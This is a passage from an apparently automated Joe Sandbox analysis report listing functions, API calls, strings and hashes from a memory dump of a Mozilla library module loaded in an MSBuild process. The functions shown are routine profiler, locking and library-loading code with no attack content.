                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD1EC
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD1F5
                                                                                                                                                                                                                        • Part of subcall function 6C8DAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C8DAE20
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD211
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD217
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD226
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD279
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8DD2B2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3049780610-0
                                                                                                                                                                                                                      • Opcode ID: 6fa8b2125fcccfb4cbec6ed19afbb828fe96b9e6e66ec763e7d82104a480b1ea
                                                                                                                                                                                                                      • Instruction ID: 1889868363f2cbcb9472b0c8fccc1ccd00a3913f48045312b1e2e72fbe3c028e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fa8b2125fcccfb4cbec6ed19afbb828fe96b9e6e66ec763e7d82104a480b1ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17217E71708705DFCB14DF64C488A9EB7B1FF8A324F214A2EE51A87740DB30A809CB96
                                                                                                                                                                                                                      Function 6C8CF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF619
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C8CF598), ref: 6C8CF621
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF637
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000,?,6C8CF598), ref: 6C8CF645
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000,?,6C8CF598), ref: 6C8CF663
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C8CF62A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                      • API String ID: 1579816589-753366533
                                                                                                                                                                                                                      • Opcode ID: 67089e4dbfa89749c3f5e61e199a0bc1ce454e522a4d3fd525064f7bdadc52a5
                                                                                                                                                                                                                      • Instruction ID: 983852cf06fb641524b18b7a0a26c50aa8e8dc4099f0684af33ec38b413f8e4c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67089e4dbfa89749c3f5e61e199a0bc1ce454e522a4d3fd525064f7bdadc52a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6211C171309205ABDB10AF18CA48DA6B779FF8635CB20086DEA0583F01CB71EC25CBA5
                                                                                                                                                                                                                      Function 6C892070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,6C891C5F), ref: 6C8920AE
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C8920CD
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8920E1
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C892124
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                      • String ID: CoInitializeSecurity$combase.dll
                                                                                                                                                                                                                      • API String ID: 4190559335-2476802802
                                                                                                                                                                                                                      • Opcode ID: a914d26476aa1be757c4a825ffcd869a41f2d567feb1e3c6dcec3ac7f7f8e2f9
                                                                                                                                                                                                                      • Instruction ID: 19542c640a189666b34a8804922150898830f1277b6bf73d46f7c0a46e982cd6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a914d26476aa1be757c4a825ffcd869a41f2d567feb1e3c6dcec3ac7f7f8e2f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81214876308209ABDF21CF58DD48DAA3BB6FB4A368F20441CFA1492650D331E961DF90
                                                                                                                                                                                                                      Function 6C8C99A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8C99C1
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8C99CE
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8C99F8
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8C9A05
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8C9A0D
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: GetCurrentThreadId.KERNEL32 ref: 6C8C9A95
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8C9A9D
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8C9ACC
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8C9BA7
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C8C9BB8
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C8C9BC9
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C8C9A15
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                                                                                                                                                                      • API String ID: 2359002670-141131661
                                                                                                                                                                                                                      • Opcode ID: 08b6794d1f814558df1663809e60d44c9152b6f9836f1bf2dd91665afa5e99ed
                                                                                                                                                                                                                      • Instruction ID: 262061d915715f31ba1228020cd04098d61d8da32048dde17193f9449b0069ae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08b6794d1f814558df1663809e60d44c9152b6f9836f1bf2dd91665afa5e99ed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B01267270C124DBDB206F2995086AA3B78EF8221DF2408AEED0953B01C734C905C6B6
                                                                                                                                                                                                                      Function 6C891FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C891FDE
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C891FFD
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C892011
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C892059
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                      • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                                                                      • API String ID: 4190559335-2197658831
                                                                                                                                                                                                                      • Opcode ID: f234707dfbe3ca5298fb8ed01cb4c3d6cabb632d57210687f8e6142e3ae4c6c9
                                                                                                                                                                                                                      • Instruction ID: 954ef841b4f1690b0247545b467702affbfba74bb2ba3566eb692088fcce668d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f234707dfbe3ca5298fb8ed01cb4c3d6cabb632d57210687f8e6142e3ae4c6c9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37113775309204AFEF20DF19C949EAA3B79EF8636DF20442DE90592640D735E950CBA5
                                                                                                                                                                                                                      Function 6C890EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C8BD9F0,00000000), ref: 6C890F1D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C890F3C
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C890F50
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8BD9F0,00000000), ref: 6C890F86
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                      • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                                                                      • API String ID: 4190559335-2063391169
                                                                                                                                                                                                                      • Opcode ID: c08c070f9231ee36fb6a3a3babae1f86959f7e58b894ba151cb37398f25623db
                                                                                                                                                                                                                      • Instruction ID: 0194569d398c0c1eb590a55dd8a4f0d5bb04b38e8ff2fdccfe99dcc220db3423
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c08c070f9231ee36fb6a3a3babae1f86959f7e58b894ba151cb37398f25623db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 281182757092409BDF60CF5CCA08E6A37B5EB8B329F204A2DE90692BC1D730E605CB59
                                                                                                                                                                                                                      Function 6C8CF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF559
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF561
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF577
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF585
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF5A3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6C8CF3A8
                                                                                                                                                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6C8CF499
                                                                                                                                                                                                                      • [I %d/%d] profiler_resume, xrefs: 6C8CF239
                                                                                                                                                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C8CF56A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                      • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                      • Opcode ID: 8c4f93158b636b75638192ee1e3bd2db6bc1afbaf26269fdb972ff56aaad1330
                                                                                                                                                                                                                      • Instruction ID: 568077fc78ccacfa0cf33b6b7a67438336a63581d412caa3563236eab425b247
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c4f93158b636b75638192ee1e3bd2db6bc1afbaf26269fdb972ff56aaad1330
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDF054767042049FEB106F69D84C95A77BDEB8625DF20046DEF0583701DB75C90587A5
                                                                                                                                                                                                                      Function 6C8CF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF619
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C8CF598), ref: 6C8CF621
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF637
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000,?,6C8CF598), ref: 6C8CF645
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000,?,6C8CF598), ref: 6C8CF663
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C8CF62A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                      • API String ID: 2848912005-753366533
                                                                                                                                                                                                                      • Opcode ID: fe267e4c025543341db681c7eb4f1206f5071da0213a2ca11fb7a60dc6e3d151
                                                                                                                                                                                                                      • Instruction ID: dceb35fddc06644032d9795af420d94745848d99b2e5eab98ea4de0721384ad7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe267e4c025543341db681c7eb4f1206f5071da0213a2ca11fb7a60dc6e3d151
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF05475304204ABEB106B69C84CD5A777DEB8629DF20046DFE0583741CB758D0587A5
                                                                                                                                                                                                                      Function 6C890E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,6C890DF8), ref: 6C890E82
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C890EA1
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C890EB5
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C890EC5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                      • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 391052410-1680159014
                                                                                                                                                                                                                      • Opcode ID: 312751069bc5c79deec77c239b529fa3d54b3025410e851dec62c589f1cfdb27
                                                                                                                                                                                                                      • Instruction ID: fc1e16a58c0101f6054b8759ef148818d35068cdbe9dc00599f83f29a4491fb8
